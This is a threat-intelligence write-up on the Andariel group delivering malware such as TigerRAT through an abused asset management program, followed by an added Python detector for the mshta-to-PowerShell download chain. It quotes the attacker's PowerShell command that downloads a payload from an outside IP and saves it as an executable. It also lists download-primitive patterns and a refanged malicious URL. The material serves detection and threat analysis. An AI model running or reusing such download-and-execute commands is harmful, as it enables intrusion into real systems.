Hackers Exploit Asset Management Program to Deploy Malware
Recent reports identify the Andariel group as distributing malware through asset management programs. The group has previously been linked to the Lazarus group.
Andariel is known to use supply chain, spear phishing, and watering hole attacks for initial access.
In recent campaigns the group exploited the Log4Shell vulnerability and Innorix agents to attack several corporate sectors in South Korea. In another case, MS-SQL servers were targeted for malware installation.
The malware used in these attacks includes TigerRAT, NukeSped variants, Black RAT, and Lilith RAT. As in their previous attacks, the primary targets were South Korean communications companies and semiconductor manufacturers.
Hackers Exploit Asset Management Program
Initial Access
In one case, logs showed that an asset management program had been abused to deploy the malware.
The program launched mshta.exe, which in turn ran the PowerShell command below to download Andariel's malware. Note that wget is PowerShell's alias for Invoke-WebRequest, and that the payload is served under an image name (load.png) but written as an executable into C:\Users\Public, a directory writable by every local user.
PowerShell command: wget hxxp://109.248.150[.]147:8585/load.png -outfile C:\Users\public\credis.exe
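The command above gives a detection engineer three things to key on: the parent/child pair mshta.exe -> powershell.exe, a PowerShell download primitive (wget/curl/iwr are aliases of Invoke-WebRequest), and an executable dropped into C:\Users\Public under a name that does not match the .png on the server. The following is an added example, not code from the original report or from ASEC, that scores Sysmon Event ID 1-style process-creation records against that chain. The records are constructed for illustration; the only real indicator in them is the URL quoted on the page, refanged as it would appear in a live log. The refang() step is an assumption about how analysts paste indicators, so the same logic runs over defanged report text as well as raw telemetry.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample records, shaped like Sysmon Event ID 1 (process creation)
# fields. Not taken from the original report; the URL in the second record is
# the IOC quoted on the page, refanged as it would appear in a log.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # benign: the asset management agent runs its own inventory script
        "ParentImage": r"C:\Program Files\AssetMgr\agent.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell.exe -File "C:\Program Files\AssetMgr\inventory.ps1"',
    },
    {   # the chain on the page: mshta.exe -> PowerShell -> wget into C:\Users\public
        "ParentImage": r"C:\Windows\System32\mshta.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell wget http://109.248.150.147:8585/load.png -outfile C:\Users\public\credis.exe",
    },
    {   # mshta launching PowerShell with no download: one signal, not enough to alert
        "ParentImage": r"C:\Windows\System32\mshta.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -c Get-Date",
    },
]

# PowerShell download primitives, including the wget/curl/iwr aliases.
DOWNLOAD_RE = re.compile(
    r"\b(wget|curl|iwr|Invoke-WebRequest|Invoke-RestMethod|Start-BitsTransfer|"
    r"DownloadFile|DownloadString)\b",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)
OUTFILE_RE = re.compile(r"-outfile\s+(\S+)", re.IGNORECASE)
PUBLIC_DIR_RE = re.compile(r"^[a-z]:\\users\\public\\", re.IGNORECASE)
IMAGE_EXT = (".png", ".jpg", ".jpeg", ".gif", ".bmp")
EXEC_EXT = (".exe", ".dll", ".scr", ".bat", ".ps1")


def refang(text: str) -> str:
    """Turn defanged indicators (hxxp://1.2.3[.]4) back into their live form so
    the same regexes work on pasted report text and on raw logs."""
    return (text.replace("hxxps://", "https://").replace("hxxp://", "http://")
                .replace("[.]", ".").replace("[:]", ":"))


def analyze_event(ev: Dict[str, str]) -> Dict[str, object]:
    """Score one process-creation record against the mshta -> PowerShell ->
    download-to-Public chain. Reasons are returned so an analyst sees why it fired."""
    parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    cmd = refang(ev.get("CommandLine", ""))
    reasons: List[str] = []

    is_ps = image in ("powershell.exe", "pwsh.exe")
    if parent == "mshta.exe" and is_ps:
        reasons.append("mshta.exe spawned PowerShell (LOLBin proxy execution)")

    url_m = URL_RE.search(cmd)
    out_m = OUTFILE_RE.search(cmd)
    url = url_m.group(0) if url_m else None
    outfile = out_m.group(1).strip("'\"") if out_m else None

    if is_ps and url and DOWNLOAD_RE.search(cmd):
        reasons.append(f"PowerShell download primitive fetching {url}")
    if outfile and PUBLIC_DIR_RE.match(outfile):
        reasons.append(f"payload staged in world-writable C:\\Users\\Public ({outfile})")
    if url and outfile and url.lower().endswith(IMAGE_EXT) and outfile.lower().endswith(EXEC_EXT):
        reasons.append("URL masquerades as an image but is written as an executable")

    # Threshold of two independent signals keeps a lone mshta->powershell
    # launch (common in some admin tooling) as a hunting lead rather than an alert.
    return {
        "suspicious": len(reasons) >= 2,
        "score": len(reasons),
        "reasons": reasons,
        "url": url,
        "outfile": outfile,
    }


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, Dict[str, object]]]:
    """Return (index, result) for every event that crosses the alert threshold."""
    hits = []
    for i, ev in enumerate(events):
        res = analyze_event(ev)
        if res["suspicious"]:
            hits.append((i, res))
    return hits


if __name__ == "__main__":
    for idx, res in scan(SAMPLE_EVENTS):
        print(f"event {idx}: score {res['score']}")
        for r in res["reasons"]:
            print("  -", r)
```

Only the second constructed record crosses the threshold; it accumulates all four signals, and the extracted url and outfile fields are exactly the indicators a responder would pivot on (block the host/port at egress, sweep endpoints for the dropped path). The refang step also means the defanged command line as printed on this page scores identically when pasted in.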
Malware Used in Attacks
The most frequently installed backdoors were TigerRAT, Black RAT, and NukeSped.
In recent attacks, the open-source Lilith RAT was also used, and in other cases malware written in Go was discovered.
TigerRAT
This malware supports various features like uploading and downloading files, executing commands, collecting basic information, keylogging, taking screenshots, and port forwarding.
Unlike most backdoors, TigerRAT performs an authentication step during its initial communication with the operator's server.
Golang Downloader
…